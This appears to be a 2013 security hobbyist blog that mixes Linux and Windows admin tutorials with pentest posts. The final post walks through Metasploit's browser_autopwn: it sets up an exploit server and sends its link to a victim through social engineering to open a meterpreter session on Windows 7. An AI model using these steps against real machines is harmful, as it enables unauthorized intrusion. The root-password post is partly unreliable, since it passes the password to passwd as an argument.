Cyber Survivals

Thursday, 23 May 2013

Disable Task Manager in Windows 7?

Disable Task Manager in Windows 7?

Manual Registry Hack

Open up regedit.exe through the start menu search or run box, and then navigate down to the following key:


On the right-hand side is a 32-bit REG_DWORD value named DisableTaskMgr with one of two values:

  • 1 – Disable task manager
  • 0 – Enable task manager
Just double-click and change the value, or even delete the key. The change should take place immediately.

How to secure Facebook Account??

How to secure Facebook Account???

1) Create a Strong Password

Choose very strong Password which is very hard to guess for other and easier to you. 
Always choose your password as combination of Lowercase + Uppercase + Numbers.

2) Enable Facebook Integrated Security

very few people know about facebook integratted security settings.
Right corner at the top of the page.

Now, GO to Account settings. it will take you to Account Settings > Security (left side of the page)
Then security page will open the click on the Secure Browsing enabled and then save it.

3) LogOut your Account when you Finish your Surfing

Always logout your account to be safe.

4) Do Not Click on Suspicious  Links

5) Don't ever share your account password with anyone.

So Enjoy Social Life....Be Safe, Be Cautions

Sunday, 19 May 2013

Install CentOS 6

1)  Insert Install media and restart Computer. After booting, following screen is shown, then Push Enter key.

2)  This is the section to check a media, Skip it if you don't need it.

3)  Click "Next" button to proceed.

4)  Select the language you'd like to use during the installation.

5)  Select the keyboard type you using.

6) Select the type of storage. If you install CentOS 6 to local HD, select 'Basic Storage Devices'. If you install to HD that is connected in storage network area or mainframe, select the bottom.

7)  Click Yes to proceed if it's no ploblem to remove any data on the HD you try to install.

 8)  Set a Hostname of your computer. 

9)  Set your nearest timezone.
10) Set root user's password.

11)  Select installation type as follows. On this example, select "Use All Space" and check a box "Review and modify partitioning layout" to configure partitions manually.

12)  Click 'Next' button with keeping default. If you set some parameters for bootloader, Configure it. 

13) Select softwares to install. Select 'Minimal' and go next. It's unnecessarry to install many packages at first. But if you are beginer on Linux system, check a box 'Customize now' and Install additional packages because it's inconvenience if only 'Minimal' is installed.

 14) If you selected "Customize now" at previous section, following screen is shown. It's better to check a box "Base" if you are beginer.

 15) Installation starts. 

16)  Installation completed. Click "Reboot" button. 

Get CentOS 6

Download CentOS 6

1)  Here is the configuration Examples for CentOS 6 that is compatible with Red Hat Enterprise Linux 6.

Download ISO file ( CentOS-6.4-x86_64-bin-DVD1.iso ) for installation from the following site.

If your computer is old and not supported 64 bit computing, download 32 bit version from below.

2)  Burn ISO file to DVD with an application on your computer and Make an Installation Disk. After finishing it, proceed to next step for installing CentOS 6

Thursday, 11 April 2013

DNSenum - Gathering DNS Information

DNSenum is a tool that is designed with the purpose of enumerating DNS information about a domain. This is the one of the best tool used for information gathering which is the first step of the hacking.

The program mainly performs the following operations.

1) Get the Host address (A records)
2) Get the nameservers
3) Get the MX records

Lets begin:

First of all we need to go to the directory of the DNSenum where it is located.

In BT5 this is located in    /pentest/enumeration/dns/dnsenum

To Run:   perl []

As shown in above first it will get is the host address and Next we will see the name servers which give us the idea of the hosting provider. After that is the MX records where we can see the mail server of our target host.

Saturday, 6 April 2013

Installing Metasploit Community Edition on Backtrack 5 R3

Backtrack 5 comes with pre-installed  metasploit framework v4.0 but now Metasploit Community comes with updated  Web Ui version and others functionalities and even more expolits.

Now the current available version is Metasploit framework v4.5 which can be easily downloadable

To download Metasploit Framework Download  

Step1: Download latest Metasploit framework installer from above link

Step2: Installing Metasploit Community over the existing metasploit framework installation won't work for several reasons, one being the postgres cdatabase conflict.
The best way to start by uninstalling the earlier version of Metasploit Framework first and comes to the metasploit directory and uninstall using below commands.

# cd /opt/metasploit/
# ls
# ./uninstall

Step3: Make installer executable

When download has completed with file name "". open new terminal window and enter the following commands.

# chmod u+x /root/

Step4: Run Installer

# ./

At the end of the installer, the metasploit web Ui open in your browser (https://localhost:3790/) in follow the steps to register and choose the metasploit community edition for free and now you have to give the licence key for the community edition, which you received on your mail which you registered.

 Step 5: open msfconsole and update

# msfconsole
#  sudo msfupdate

Sunday, 31 March 2013

How to Reset the Root Password for Linux

At some point we can't remember the Root password for our Linux machine. At that time we stuck in between and we have only option to  re-install linux once again. Today we will learn how to reset root password with Linux live cd.

The only thing you need is a bootable linux live cd.

you can use Ubuntu in "Try Ubuntu"mode, OpenSuse in "Recovery" mode and Backtrack5 in "Forensics" mode. Other live cd  will be fine but it has to be the same architecture (x86 or x64) as your installed system.

Step1: you have to do is to find out the name of the partition on which you installed system in located. If you have only one hard drive it should be sda1 or sda2 but to find out you can use fdisk command.

# fdisk -l

Step2: Once you found the correct partition you have to mount it and have to bind the dev environment

# Sudo mount  /dev/sda1  /mnt

#sudo mount  --bind  /dev/  /mnt/dev

Step3: After that you have to change your root directory from live environment to the installed system.
 # sudo chroot  /mnt 

Step 4: Now you can work in your installed environment and easily set a new root password.

# sudo passwd 12345

Step 5: Finally exit chroot mode and reboot system.

#sudo reboot

You should now be able to log in as root using the new password 

How to change Backtrack Hostname root@bt#

Here, we see how to change Default Backtrack Hostname to your desired one.

By default your hostname will be bt and can be identified by root@bt# in terminal.

Step 1: To Check your hostname use hostname command.

As you can see my hostname is "bt"

Step 2: To change your hostname, you can run hostname command following your desired name.

hostname csurvivals

To view the change you should open the new terminal.

Step 3: The above command only applied to change for the present session, when you restart hostname service or restart your computer it will back to your earlier hostname (root@bt#)

command to restart service : service hostname restart

Step 4: To make teh hostname permanent, we need to edit the hostname file which resides in /etc/hostname using any editor.

root@bt# vi /etc/hostname
then change the "bt" with your desired name and save the file.

press "i" to insert mode
press "Esc" command mode
type ":w" to save

Step 5: Restart hostname service or Restart your computer.


Saturday, 30 March 2013

How to Hack Windows 7 in LAN using Metaspolit (Metasploit Browser Autopwn)

In nowdays due to firewall restrictions and patch management policies exploitation of systems become more difficult .However one of the most efficient way to use of client side attacks.

Browser Autopwn is one of the client side attack. Here we will examine the effectiveness of the Metasploit Browser Autopwn Module.

The Basic Idea behind that module is that it creates a web server in our local machine which will contain different kind of browser exploits. When the user will open the malicious link then the execution of the exploits will start against the browser of the user and if one of the exploits is successful a meterpreter session will open.

Set up Required

Attacker: Backtrack 5

Victim: Windows 7

Step 1:Open Backtrack terminal and type msfconsole

Step 2: Now type use auxiliary/server/browser_autopwn

Step 3: Now set LHOST, PORT, URIPATH

msf auxiliary(browser_autopwn) > set lhost

msf auxiliary(browser_autopwn)> set port 4444 (you can use port 80 also) 
msf auxiliary(browser_autopwn) > set uripath / 
msf auxiliary(browser_autopwn) > exploit

Send the link of the server to the victim via chat or email or any social engineering technique.

You now have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Most of the organizations are behind proxy firewalls so only the port 80 is allowed and many employees are using social networks these days. An attacker can exploit that and send  malicious link to user through social networks to users. So, Metasploit  Browser Autopwn Module is the proof of how dangerous is to open links that are coming from untrusted sources.